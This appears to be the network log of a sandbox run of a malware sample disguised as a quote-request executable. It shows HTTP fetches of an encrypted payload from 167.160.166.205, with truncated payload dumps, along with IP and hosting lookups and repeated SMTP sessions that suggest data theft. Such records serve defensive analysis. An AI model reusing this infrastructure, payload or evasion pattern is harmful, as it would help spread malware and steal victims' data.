                                                                  May 8, 2024 09:41:56.791958094 CEST51324443192.168.11.20172.67.74.152
                                                                  May 8, 2024 09:41:56.832179070 CEST44351324172.67.74.152192.168.11.20
                                                                  May 8, 2024 09:41:57.082761049 CEST44351324172.67.74.152192.168.11.20
                                                                  May 8, 2024 09:41:57.082854986 CEST44351324172.67.74.152192.168.11.20
                                                                  May 8, 2024 09:41:57.083517075 CEST51324443192.168.11.20172.67.74.152
                                                                  May 8, 2024 09:41:57.083786964 CEST51324443192.168.11.20172.67.74.152
                                                                  May 8, 2024 09:41:57.186182022 CEST5132580192.168.11.20208.95.112.1
                                                                  May 8, 2024 09:41:57.284775972 CEST8051325208.95.112.1192.168.11.20
                                                                  May 8, 2024 09:41:57.285686970 CEST5132580192.168.11.20208.95.112.1
                                                                  May 8, 2024 09:41:57.285686970 CEST5132580192.168.11.20208.95.112.1
                                                                  May 8, 2024 09:41:57.386409044 CEST8051325208.95.112.1192.168.11.20
                                                                  May 8, 2024 09:41:57.433129072 CEST5132580192.168.11.20208.95.112.1
                                                                  May 8, 2024 09:41:59.906135082 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.088332891 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.088599920 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.323626041 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.324112892 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.506098986 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.506979942 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.507105112 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.507121086 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.507427931 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.507529974 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.690093040 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.690550089 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.873848915 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.873939991 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.873950958 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:00.874177933 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:00.875020981 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:01.057689905 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.060646057 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:01.242857933 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.242944956 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.242955923 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.243060112 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:01.243189096 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:01.425448895 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.425842047 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:01.644103050 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.644459963 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:01.826776981 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:01.827146053 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.009426117 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.009720087 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.192007065 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.192771912 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.192804098 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.192852974 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.192852974 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.193202972 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.193227053 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.193269968 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.374838114 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.375215054 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.375225067 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.375437021 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.375580072 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.375639915 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.375650883 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.375685930 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.375917912 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.376085043 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.376255035 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:02.557537079 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.557728052 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.558093071 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.558244944 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.597826004 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.704705000 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:02.760040045 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:20.949609041 CEST8051319208.95.112.1192.168.11.20
                                                                  May 8, 2024 09:42:57.232543945 CEST51320587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:57.415174961 CEST58751320185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:57.415249109 CEST58751320185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:57.415396929 CEST58751320185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:57.415450096 CEST58751320185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:42:57.415641069 CEST51320587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:57.415704012 CEST51320587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:42:58.685448885 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:42:58.790508986 CEST8051316167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:42:58.790767908 CEST5131680192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:43:15.115272045 CEST8051325208.95.112.1192.168.11.20
                                                                  May 8, 2024 09:43:15.115552902 CEST5132580192.168.11.20208.95.112.1
                                                                  May 8, 2024 09:43:37.395927906 CEST5132580192.168.11.20208.95.112.1
                                                                  May 8, 2024 09:43:37.494517088 CEST8051325208.95.112.1192.168.11.20
                                                                  May 8, 2024 09:43:39.941886902 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:43:40.123893023 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:43:40.125240088 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:43:40.125511885 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:43:40.125627041 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:43:40.125647068 CEST58751326185.230.214.164192.168.11.20
                                                                  May 8, 2024 09:43:40.125708103 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:43:40.125817060 CEST51326587192.168.11.20185.230.214.164
                                                                  May 8, 2024 09:43:44.362859011 CEST5132380192.168.11.20167.160.166.205
                                                                  May 8, 2024 09:43:44.467303038 CEST8051323167.160.166.205192.168.11.20
                                                                  May 8, 2024 09:43:44.467590094 CEST5132380192.168.11.20167.160.166.205
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 8, 2024 09:41:12.704090118 CEST5774253192.168.11.201.1.1.1
                                                                  May 8, 2024 09:41:12.803138971 CEST53577421.1.1.1192.168.11.20
                                                                  May 8, 2024 09:41:13.875375986 CEST6042353192.168.11.201.1.1.1
                                                                  May 8, 2024 09:41:13.975013018 CEST53604231.1.1.1192.168.11.20
                                                                  May 8, 2024 09:41:17.225372076 CEST5420953192.168.11.201.1.1.1
                                                                  May 8, 2024 09:41:17.326499939 CEST53542091.1.1.1192.168.11.20
                                                                  May 8, 2024 09:41:57.085778952 CEST5473553192.168.11.201.1.1.1
                                                                  May 8, 2024 09:41:57.185282946 CEST53547351.1.1.1192.168.11.20
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  May 8, 2024 09:41:12.704090118 CEST192.168.11.201.1.1.10xb8c2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:13.875375986 CEST192.168.11.201.1.1.10xcc71Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:17.225372076 CEST192.168.11.201.1.1.10xae58Standard query (0)smtp.zoho.euA (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:57.085778952 CEST192.168.11.201.1.1.10xccfaStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  May 8, 2024 09:41:12.803138971 CEST1.1.1.1192.168.11.200xb8c2No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:12.803138971 CEST1.1.1.1192.168.11.200xb8c2No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:12.803138971 CEST1.1.1.1192.168.11.200xb8c2No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:13.975013018 CEST1.1.1.1192.168.11.200xcc71No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:17.326499939 CEST1.1.1.1192.168.11.200xae58No error (0)smtp.zoho.eu185.230.214.164A (IP address)IN (0x0001)false
                                                                  May 8, 2024 09:41:57.185282946 CEST1.1.1.1192.168.11.200xccfaNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                  • api.ipify.org
                                                                  • 167.160.166.205
                                                                  • ip-api.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.11.2051316167.160.166.205801456C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  May 8, 2024 09:41:08.807914972 CEST175OUTGET /LkTupLMJe71.bin HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: 167.160.166.205
                                                                  Cache-Control: no-cache
                                                                  May 8, 2024 09:41:08.912961960 CEST1289INHTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Tue, 07 May 2024 20:34:58 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "80de2c7bea0da1:0"
                                                                  Server: Microsoft-IIS/8.5
                                                                  Date: Wed, 08 May 2024 07:41:08 GMT
                                                                  Content-Length: 251968
                                                                  Data Raw: 8f ad 6b 4d fd dc a4 9a 9b 6a a4 af a2 d3 1e aa 23 51 4d 3a 97 96 e2 56 8d 6e f2 f0 df 18 ab be bb a6 2a 59 41 f8 85 74 bb 1a e2 37 b8 ec cc 57 c5 2c f9 c9 f5 ac 87 6a 39 da bb e6 1b 44 93 22 1a e3 de bb 8e 5f 8e eb 74 00 74 c6 8a 92 f5 87 d3 2a 03 d0 55 65 09 e6 b7 b3 fc b4 a8 0f 24 da 40 61 87 c3 e8 c8 82 8a 16 b4 c8 29 ac ae 95 34 a7 85 a6 97 e1 cb 9d b0 6e a3 75 38 47 87 42 a8 64 fd a5 b3 fc 4d a0 dc ce 4c 23 1b 84 75 39 89 9b c5 11 82 7a 8b 7f 93 64 eb 93 f1 ca 91 60 d6 93 c7 d6 3f d0 08 48 0a 0b be d7 b1 20 0a cd 9b 0f 47 53 42 0a 39 a9 8b 94 6e fe 92 fe 52 c7 4b c5 50 94 a9 8e eb 63 d7 bb 12 50 2f 2f 80 44 7b 1c 68 7e 0e ca 20 fc 9d 77 28 c4 e4 ce 39 2e 9c 5c b5 fb 72 0f 06 4a a7 02 df cd 10 aa b9 cb ff 9a 26 ca c1 5e ae ce 32 35 77 fd 1e 9b c6 f7 8b 0e 02 ab 58 62 44 76 7a 47 7c e4 23 74 66 9d 01 f2 b2 e7 9e cc ad af fb 0b cc c5 ed ab 59 ac e7 40 ad 90 44 57 e6 cd aa 01 97 4e 79 4d d4 4c cf c2 5f fe 1f 83 90 96 50 3b 94 4a 5b 81 ab c6 ad cf dd 60 db 4c ee dc a1 80 cf 83 d8 ae e6 9a 18 95 9b [TRUNCATED]
                                                                  Data Ascii: kMj#QM:Vn*YAt7W,j9D"_tt*Ue$@a)4nu8GBdML#u9zd`?H GSB9nRKPcP//D{h~ w(9.\rJ&^25wXbDvzG|#tfY@DWNyML_P;J[`LG;zM9I|QtVD<b`QXPOGJWidx*.dYxg`4srh!HvhMLXRI$]}d&clz4MC8pq8z3+~'sD<W[>6!(@oIttc+p .UB!gYQz?Yr? pNGrc0Zf\Ix'emU,fEh^J*N"Fyq/Tca@ d4B/kx+)D*"57i<h;_"$QI~f2Wk01(N:4ff|f%j +t\`Be2hI{f}2(sqpaq72jK<^,W$J00\B8QqI:@twBTS<.CP{N9jgz4QhC8s4{`A\vRs ;`_@jIHe9SFY'V3* [TRUNCATED]
                                                                  May 8, 2024 09:41:08.913042068 CEST1289INData Raw: 98 a5 d4 8c a1 dd 4b 9e 04 e2 5d 94 62 f8 b7 d5 fc c3 d7 4a 8c 20 8a 1e d9 b7 55 1b a5 e2 1e 82 7d 1f 29 08 fd f0 bb 32 ab 62 48 83 9f b9 63 68 06 65 fb 22 c2 c1 f0 53 9f 52 f1 bd 9f 0b 50 4b 27 41 34 19 7c 95 f0 3a 7f 4c 1e 61 ef 2c 6b e1 1d b4
                                                                  Data Ascii: K]bJ U})2bHche"SRPK'A4|:La,kG,qZo0,wj@-rC$5Fc%B/iGd$.f):ZfV',jhYwcuvlC|'pm\?H5*MLIM;t1h.ll
                                                                  May 8, 2024 09:41:08.913101912 CEST1289INData Raw: 27 1e 1c 19 c3 aa 19 19 b3 95 6c e9 c5 62 48 c0 ff e8 80 66 e0 7f 94 8c 7d 4b 6a c6 22 11 2f 89 f5 5b aa 92 fe a4 55 f1 70 30 27 c4 25 f2 86 4d b4 36 59 0d 96 b2 62 89 13 ad 07 58 7a ee 85 be 26 72 55 6d 19 09 49 46 3a e0 70 ef 88 ac 12 6f 02 b8
                                                                  Data Ascii: 'lbHf}Kj"/[Up0'%M6YbXz&rUmIF:poPahW]x@-y?3#mA3j;T?G]T{QIFH<WXW$NJvGQ8GQ\H5VR2G.kE
                                                                  May 8, 2024 09:41:08.913161039 CEST1289INData Raw: 97 ba 88 52 40 4b 4a 5b 85 81 e4 af 24 4c bc db 1f ea f6 bf 82 b4 60 d8 e8 e7 b0 3a 97 98 3a 16 9a 87 94 86 25 78 7e f8 15 4d db ee 1b 3c 80 34 e0 87 7c 55 fe ec b5 0f bf 98 44 38 9d de 95 61 1d 18 c5 db a1 7b 04 89 23 21 11 dc e1 9d 72 83 dd c5
                                                                  Data Ascii: R@KJ[$L`::%x~M<4|UD8a{#!r)OmDinz*$Xxm@>l+?;L~Pa\}j(KexOMt>s358z|$>,-q[Q#ETpP#?#S
                                                                  May 8, 2024 09:41:09.018414021 CEST1289INData Raw: 98 7d e3 60 b7 e3 8c bb 8d 73 0d 68 63 1e 27 de 5e 8c 2b 04 4a 85 61 fd 9e f2 e2 41 89 1d 32 14 c0 10 bf 4f cc c6 b8 24 d1 57 bb f9 5a 5b b6 06 12 c7 87 8b 3c 08 61 12 06 13 12 eb 8a a2 ef 09 04 8b 8a f0 5b 22 ff 8d bd 7a b8 a8 51 85 12 62 f9 bc
                                                                  Data Ascii: }`shc'^+JaA2O$WZ[<a["zQb B!;t/&06R)sNYpzumk*#UeW@aC6)P4XnuLj71"WZmH=M[z=%IB%7'$
                                                                  May 8, 2024 09:41:09.018486977 CEST1289INData Raw: bb f8 63 1e 7b 11 d7 76 44 ed e7 94 9f f3 3c 60 db 92 e2 70 6d f9 9d 92 99 82 62 c1 c5 ff 2b 36 8e a6 27 09 d7 e4 2a 08 db ff 12 1d f3 69 56 b6 cd 08 0c f8 d3 00 b2 2d 6c 24 38 38 4f b5 dd 6c be 3b c3 a8 c0 75 20 ac 36 82 da a1 78 4f 3a 7a a3 06
                                                                  Data Ascii: c{vD<`pmb+6'*iV-l$88Ol;u 6xO:zORsEBrE@+-}\M*:WK=ed.3$p@_)33qE7Q5Qc)"ST~O#m?#(hH$"^
                                                                  May 8, 2024 09:41:09.018547058 CEST1289INData Raw: bc 24 b4 cc 33 ea c2 7c 19 19 ca b0 5d 80 d2 6f 42 38 f9 95 0e d7 c8 d1 51 eb bf 34 8c cc c4 6f 75 86 a7 2d f0 ac 14 2f 77 fd b6 31 ac cd f1 d4 75 4d d8 da df ba 94 ab 45 fc 3c 2a 22 f1 43 45 90 32 87 2b 03 aa c9 f1 95 6f c2 09 2b 40 5d c2 0b 04
                                                                  Data Ascii: $3|]oB8Q4ou-/w1uME<*"CE2+o+@]Vx~= 7CNng?ayVmF)E}Yzb]4$&ae:^xni@&?fREhij4G%_\jy7(j5{r<a\WB0GbQ,d!
                                                                  May 8, 2024 09:41:09.018600941 CEST1289INData Raw: 7f 49 c1 38 84 cc 32 2f 5e 24 ca 73 0e ff 95 e9 8c 3c 57 d8 30 d2 be 5b 1e cd 81 cf ae f3 d4 8e 87 68 f1 87 40 c4 23 d1 91 8f 84 ba 80 b7 58 71 de e2 61 d4 2b 70 26 22 c2 c0 1d b4 20 2e 75 1a c7 cb 0d bc 2f 26 0d 10 e5 e1 e9 51 db 7d d7 3f 59 f1
                                                                  Data Ascii: I82/^$s<W0[h@#Xqa+p&" .u/&Q}?YwoKpK025e2I~6m,fE/QMJTFGyQ(q@:y+#P%0dhnthck9#. ySu3Z_g
                                                                  May 8, 2024 09:41:09.018656015 CEST1289INData Raw: c6 9d b0 6e 5d 7b 34 c7 87 bc a4 66 e2 3f ae fc f9 a9 ef ee cd 2c 57 49 54 55 7c f6 b6 31 d2 1c e4 18 e1 fb 88 bf 92 ab 01 02 b5 e7 c7 ae 5a f0 7a c3 65 12 f2 b9 91 64 bb 92 bf 62 f8 3d 27 24 36 8c c0 b0 6e f4 ba bc 52 c7 41 30 1f 94 a9 c0 14 6e
                                                                  Data Ascii: n]{4f?,WITU|1Zzedb='$6nRA0nqsI/uh~&,)0\JY03d(~25ZbDvBE#tfcbJSFWwAL1S?PsU2c?1dgR:C7M9>|>
                                                                  May 8, 2024 09:41:09.018709898 CEST1289INData Raw: c5 95 29 86 02 1b 33 16 52 3d 70 45 06 b7 87 51 14 11 2d a2 be ed 99 0f 57 22 53 46 f6 6b c1 21 8e 7e d3 4d dd 94 ef 85 fb 36 1a 1a 4c cd 2a 71 02 1f c2 22 29 52 6d 82 70 11 24 22 99 cb 84 58 d0 20 88 0f 68 b2 5d 26 53 8d 5f de d7 41 b4 10 3f a7
                                                                  Data Ascii: )3R=pEQ-W"SFk!~M6L*q")Rmp$"X h]&S_A?Edv_4EC:2((^JLt(eqt[KDIJ<'Rk=3Z3d#H+\QNbdr-s},i& 0%@280:w[H
                                                                  May 8, 2024 09:41:09.018765926 CEST1289INData Raw: 8b 6c 24 18 ea 96 68 c9 7f 9d 34 67 30 15 d4 8c a7 64 d1 9e 84 e2 82 95 e2 78 37 ff 89 aa b6 28 e0 bb a4 6a b6 97 d9 72 d6 8d 52 f6 18 3f 61 a2 a8 99 94 42 d9 0d 10 82 9f b9 63 42 26 67 f9 21 c6 39 f6 5b 9f 52 0f b1 81 09 58 58 27 41 3e cd ff d3
                                                                  Data Ascii: l$h4g0dx7(jrR?aBcB&g!9[RXX'A>:HT,kC'ZLf(]I@'pA$UFe\>O:d2I;Q[O'8-jHgXa_szEC<ZLgHUU!_g_


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.11.2051319208.95.112.1801456C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  May 8, 2024 09:41:14.074429035 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  May 8, 2024 09:41:14.174720049 CEST175INHTTP/1.1 200 OK
                                                                  Date: Wed, 08 May 2024 07:41:13 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.11.2051323167.160.166.205804944C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  May 8, 2024 09:41:54.485156059 CEST175OUTGET /LkTupLMJe71.bin HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: 167.160.166.205
                                                                  Cache-Control: no-cache
                                                                  May 8, 2024 09:41:54.589946985 CEST1289INHTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Tue, 07 May 2024 20:34:58 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "80de2c7bea0da1:0"
                                                                  Server: Microsoft-IIS/8.5
                                                                  Date: Wed, 08 May 2024 07:41:54 GMT
                                                                  Content-Length: 251968
                                                                  Data Raw: 8f ad 6b 4d fd dc a4 9a 9b 6a a4 af a2 d3 1e aa 23 51 4d 3a 97 96 e2 56 8d 6e f2 f0 df 18 ab be bb a6 2a 59 41 f8 85 74 bb 1a e2 37 b8 ec cc 57 c5 2c f9 c9 f5 ac 87 6a 39 da bb e6 1b 44 93 22 1a e3 de bb 8e 5f 8e eb 74 00 74 c6 8a 92 f5 87 d3 2a 03 d0 55 65 09 e6 b7 b3 fc b4 a8 0f 24 da 40 61 87 c3 e8 c8 82 8a 16 b4 c8 29 ac ae 95 34 a7 85 a6 97 e1 cb 9d b0 6e a3 75 38 47 87 42 a8 64 fd a5 b3 fc 4d a0 dc ce 4c 23 1b 84 75 39 89 9b c5 11 82 7a 8b 7f 93 64 eb 93 f1 ca 91 60 d6 93 c7 d6 3f d0 08 48 0a 0b be d7 b1 20 0a cd 9b 0f 47 53 42 0a 39 a9 8b 94 6e fe 92 fe 52 c7 4b c5 50 94 a9 8e eb 63 d7 bb 12 50 2f 2f 80 44 7b 1c 68 7e 0e ca 20 fc 9d 77 28 c4 e4 ce 39 2e 9c 5c b5 fb 72 0f 06 4a a7 02 df cd 10 aa b9 cb ff 9a 26 ca c1 5e ae ce 32 35 77 fd 1e 9b c6 f7 8b 0e 02 ab 58 62 44 76 7a 47 7c e4 23 74 66 9d 01 f2 b2 e7 9e cc ad af fb 0b cc c5 ed ab 59 ac e7 40 ad 90 44 57 e6 cd aa 01 97 4e 79 4d d4 4c cf c2 5f fe 1f 83 90 96 50 3b 94 4a 5b 81 ab c6 ad cf dd 60 db 4c ee dc a1 80 cf 83 d8 ae e6 9a 18 95 9b [TRUNCATED]
                                                                  Data Ascii: kMj#QM:Vn*YAt7W,j9D"_tt*Ue$@a)4nu8GBdML#u9zd`?H GSB9nRKPcP//D{h~ w(9.\rJ&^25wXbDvzG|#tfY@DWNyML_P;J[`LG;zM9I|QtVD<b`QXPOGJWidx*.dYxg`4srh!HvhMLXRI$]}d&clz4MC8pq8z3+~'sD<W[>6!(@oIttc+p .UB!gYQz?Yr? pNGrc0Zf\Ix'emU,fEh^J*N"Fyq/Tca@ d4B/kx+)D*"57i<h;_"$QI~f2Wk01(N:4ff|f%j +t\`Be2hI{f}2(sqpaq72jK<^,W$J00\B8QqI:@twBTS<.CP{N9jgz4QhC8s4{`A\vRs ;`_@jIHe9SFY'V3* [TRUNCATED]
                                                                  May 8, 2024 09:41:54.590013027 CEST1289INData Raw: 98 a5 d4 8c a1 dd 4b 9e 04 e2 5d 94 62 f8 b7 d5 fc c3 d7 4a 8c 20 8a 1e d9 b7 55 1b a5 e2 1e 82 7d 1f 29 08 fd f0 bb 32 ab 62 48 83 9f b9 63 68 06 65 fb 22 c2 c1 f0 53 9f 52 f1 bd 9f 0b 50 4b 27 41 34 19 7c 95 f0 3a 7f 4c 1e 61 ef 2c 6b e1 1d b4
                                                                  Data Ascii: K]bJ U})2bHche"SRPK'A4|:La,kG,qZo0,wj@-rC$5Fc%B/iGd$.f):ZfV',jhYwcuvlC|'pm\?H5*MLIM;t1h.ll
                                                                  May 8, 2024 09:41:54.590049982 CEST1289INData Raw: 27 1e 1c 19 c3 aa 19 19 b3 95 6c e9 c5 62 48 c0 ff e8 80 66 e0 7f 94 8c 7d 4b 6a c6 22 11 2f 89 f5 5b aa 92 fe a4 55 f1 70 30 27 c4 25 f2 86 4d b4 36 59 0d 96 b2 62 89 13 ad 07 58 7a ee 85 be 26 72 55 6d 19 09 49 46 3a e0 70 ef 88 ac 12 6f 02 b8
                                                                  Data Ascii: 'lbHf}Kj"/[Up0'%M6YbXz&rUmIF:poPahW]x@-y?3#mA3j;T?G]T{QIFH<WXW$NJvGQ8GQ\H5VR2G.kE
                                                                  May 8, 2024 09:41:54.590091944 CEST1289INData Raw: 97 ba 88 52 40 4b 4a 5b 85 81 e4 af 24 4c bc db 1f ea f6 bf 82 b4 60 d8 e8 e7 b0 3a 97 98 3a 16 9a 87 94 86 25 78 7e f8 15 4d db ee 1b 3c 80 34 e0 87 7c 55 fe ec b5 0f bf 98 44 38 9d de 95 61 1d 18 c5 db a1 7b 04 89 23 21 11 dc e1 9d 72 83 dd c5
                                                                  Data Ascii: R@KJ[$L`::%x~M<4|UD8a{#!r)OmDinz*$Xxm@>l+?;L~Pa\}j(KexOMt>s358z|$>,-q[Q#ETpP#?#S
                                                                  May 8, 2024 09:41:54.694966078 CEST1289INData Raw: 98 7d e3 60 b7 e3 8c bb 8d 73 0d 68 63 1e 27 de 5e 8c 2b 04 4a 85 61 fd 9e f2 e2 41 89 1d 32 14 c0 10 bf 4f cc c6 b8 24 d1 57 bb f9 5a 5b b6 06 12 c7 87 8b 3c 08 61 12 06 13 12 eb 8a a2 ef 09 04 8b 8a f0 5b 22 ff 8d bd 7a b8 a8 51 85 12 62 f9 bc
                                                                  Data Ascii: }`shc'^+JaA2O$WZ[<a["zQb B!;t/&06R)sNYpzumk*#UeW@aC6)P4XnuLj71"WZmH=M[z=%IB%7'$
                                                                  May 8, 2024 09:41:54.695054054 CEST1289INData Raw: bb f8 63 1e 7b 11 d7 76 44 ed e7 94 9f f3 3c 60 db 92 e2 70 6d f9 9d 92 99 82 62 c1 c5 ff 2b 36 8e a6 27 09 d7 e4 2a 08 db ff 12 1d f3 69 56 b6 cd 08 0c f8 d3 00 b2 2d 6c 24 38 38 4f b5 dd 6c be 3b c3 a8 c0 75 20 ac 36 82 da a1 78 4f 3a 7a a3 06
                                                                  Data Ascii: c{vD<`pmb+6'*iV-l$88Ol;u 6xO:zORsEBrE@+-}\M*:WK=ed.3$p@_)33qE7Q5Qc)"ST~O#m?#(hH$"^
                                                                  May 8, 2024 09:41:54.695133924 CEST1289INData Raw: bc 24 b4 cc 33 ea c2 7c 19 19 ca b0 5d 80 d2 6f 42 38 f9 95 0e d7 c8 d1 51 eb bf 34 8c cc c4 6f 75 86 a7 2d f0 ac 14 2f 77 fd b6 31 ac cd f1 d4 75 4d d8 da df ba 94 ab 45 fc 3c 2a 22 f1 43 45 90 32 87 2b 03 aa c9 f1 95 6f c2 09 2b 40 5d c2 0b 04
                                                                  Data Ascii: $3|]oB8Q4ou-/w1uME<*"CE2+o+@]Vx~= 7CNng?ayVmF)E}Yzb]4$&ae:^xni@&?fREhij4G%_\jy7(j5{r<a\WB0GbQ,d!
                                                                  May 8, 2024 09:41:54.695205927 CEST1289INData Raw: 7f 49 c1 38 84 cc 32 2f 5e 24 ca 73 0e ff 95 e9 8c 3c 57 d8 30 d2 be 5b 1e cd 81 cf ae f3 d4 8e 87 68 f1 87 40 c4 23 d1 91 8f 84 ba 80 b7 58 71 de e2 61 d4 2b 70 26 22 c2 c0 1d b4 20 2e 75 1a c7 cb 0d bc 2f 26 0d 10 e5 e1 e9 51 db 7d d7 3f 59 f1
                                                                  Data Ascii: I82/^$s<W0[h@#Xqa+p&" .u/&Q}?YwoKpK025e2I~6m,fE/QMJTFGyQ(q@:y+#P%0dhnthck9#. ySu3Z_g
